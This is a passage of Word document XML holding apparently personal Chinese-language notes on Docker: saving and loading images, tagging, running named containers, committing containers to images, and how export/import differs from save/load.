        <w:t>和元数据信息（即仅保存容器当时的快照状态），所以无法进行回滚操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B132A" w14:textId="77777777" w:rsidR="00C3773A" w:rsidRDefault="00C3773A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BEDE19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc159779580"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="5A5B5ED7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）下面使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将镜像保存成一个文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E523E4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker save 0fdf2b4c26d3 &gt; hangge_server.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD220CF" w14:textId="5B16C10B" w:rsidR="003F25E6" w:rsidRPr="003F25E6" w:rsidRDefault="003F25E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F25E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003F25E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这么打包，是没有标签名字的</w:t>
      </w:r>
      <w:r w:rsidR="005F2C0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。最好指定标签名打包</w:t>
      </w:r>
      <w:r w:rsidRPr="003F25E6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342D6598" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9F4CAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）我们还可以同时将多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> image </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包成一个文件，比如下面将镜像库中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164CE46F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker save -o images.tar postgres:9.6 mongo:3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE44587" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364BFF4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>载入镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DC361" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker load &lt; hangge_server.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D1FA2" w14:textId="31367B70" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EA213D" w14:textId="424601B4" w:rsidR="00034D14" w:rsidRDefault="00034D14" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的镜像打包及运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72259E36" w14:textId="68F39832" w:rsidR="00034D14" w:rsidRDefault="00226F9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包导出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023BD8A" w14:textId="630AB859" w:rsidR="00915186" w:rsidRDefault="00915186" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先命名个版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F31B5" w14:textId="1E8EAAAB" w:rsidR="00226F9E" w:rsidRDefault="00915186" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00915186">
        <w:t>docker tag f0b0777d65d7 sd_secretdetection_docker:2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DE8F80" w14:textId="0EEE83E8" w:rsidR="008C2884" w:rsidRDefault="00915186" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包，不要根据镜像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包，不然未来没有名字，得指定</w:t>
      </w:r>
      <w:r w:rsidR="00242784">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D45ACB" w14:textId="6B2AFB03" w:rsidR="00915186" w:rsidRDefault="00915186" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00915186">
        <w:t>docker save -o sd-2.3.tar sd_secretdetection_docker:2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B040F" w14:textId="77777777" w:rsidR="00915186" w:rsidRPr="00915186" w:rsidRDefault="00915186" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A211674" w14:textId="75260C39" w:rsidR="00034D14" w:rsidRDefault="008C2884" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE072D0" w14:textId="4ECBA281" w:rsidR="00242784" w:rsidRDefault="00242784" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00242784">
        <w:t>docker load &lt; sd-2.3.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645FA4C3" w14:textId="5ACEB03E" w:rsidR="0071117E" w:rsidRDefault="00AD7C33" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD7C33">
        <w:t>docker run -itd -p 8000:8000 sd_secretdetection_docker:2.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DE46E" w14:textId="77777777" w:rsidR="00AD7C33" w:rsidRDefault="00AD7C33" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122A46E4" w14:textId="1F7EC14A" w:rsidR="00BD2554" w:rsidRDefault="00211527" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc159779581"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像</w:t>
      </w:r>
      <w:r w:rsidR="002B7D3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定容器名字</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="49A37BBF" w14:textId="491CF911" w:rsidR="002B7D3C" w:rsidRDefault="009E0D7D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定镜像名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BA179" w14:textId="77777777" w:rsidR="009E0D7D" w:rsidRDefault="009E0D7D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00211527">
        <w:t>docker run --name my_container my_image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175EF8CD" w14:textId="77777777" w:rsidR="009E0D7D" w:rsidRDefault="009E0D7D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8BB09E" w14:textId="2CA12F59" w:rsidR="002B7D3C" w:rsidRDefault="002B7D3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> load &lt; shenyanjian.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24299C7F" w14:textId="2FF0B96B" w:rsidR="00677D84" w:rsidRDefault="00677D84" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00677D84">
        <w:t>docker run -itd -p 8000:8000 --name secretdetection shenyanjian_secretdetection_docker:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D849D" w14:textId="77777777" w:rsidR="00211527" w:rsidRDefault="00211527" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DEE250" w14:textId="6872FA6D" w:rsidR="004948BD" w:rsidRDefault="004948BD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc159779582"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将容器保存为本地镜像</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="1DFE0FD3" w14:textId="36B1DE88" w:rsidR="004948BD" w:rsidRDefault="004948BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B2C8D1" w14:textId="4F66D835" w:rsidR="004948BD" w:rsidRPr="004948BD" w:rsidRDefault="00C06049" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C06049">
        <w:t>docker commit -a "blingsec" -m "sd2.0" secret_detection_http secret_detection_http:v2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F8296C" w14:textId="78E6CFBE" w:rsidR="004948BD" w:rsidRDefault="004948BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BC9EBD" w14:textId="63ABB5AD" w:rsidR="00CB2201" w:rsidRDefault="00CB2201" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是作者名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65946D" w14:textId="31568C5F" w:rsidR="00CB2201" w:rsidRDefault="00CB2201" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是标注信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053DCEB" w14:textId="51B9113D" w:rsidR="00CB2201" w:rsidRDefault="0006155C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06049">
        <w:t>secret_detection_http:v2.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12033098" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc159779583"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器和镜像导入导出操作的差异</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="1F6BE72D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0990666B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特别注意：两种方法不可混用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B5CBC6" w14:textId="0F193019" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产生的文件，虽然导入不提示错误，但是启动容器时会提示失败，会出现类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"docker: Error response from daemon: Container command not found or does not exist"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7057278B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A94FDAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1，文件大小不同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4AB31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出的镜像文件体积小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存的镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B84C5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E569C9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2，是否可以对镜像重命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC35DDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以为镜像指定新名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F5133F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker load </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能对载入的镜像重命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F02CA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CED0709" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3，是否可以同时将多个镜像打包到一个文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C33C95A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C03672" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF58876" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F80D08F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4，是否包含镜像历史</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCDF8E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入）是根据容器拿到的镜像，再导入时会丢失镜像所有的历史记录和元数据信息（即仅保存容器当时的快照状态），所以无法进行回滚操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D2B8F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">load </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载）的镜像，没有丢失镜像的历史，可以回滚到之前的层（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0ED006" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
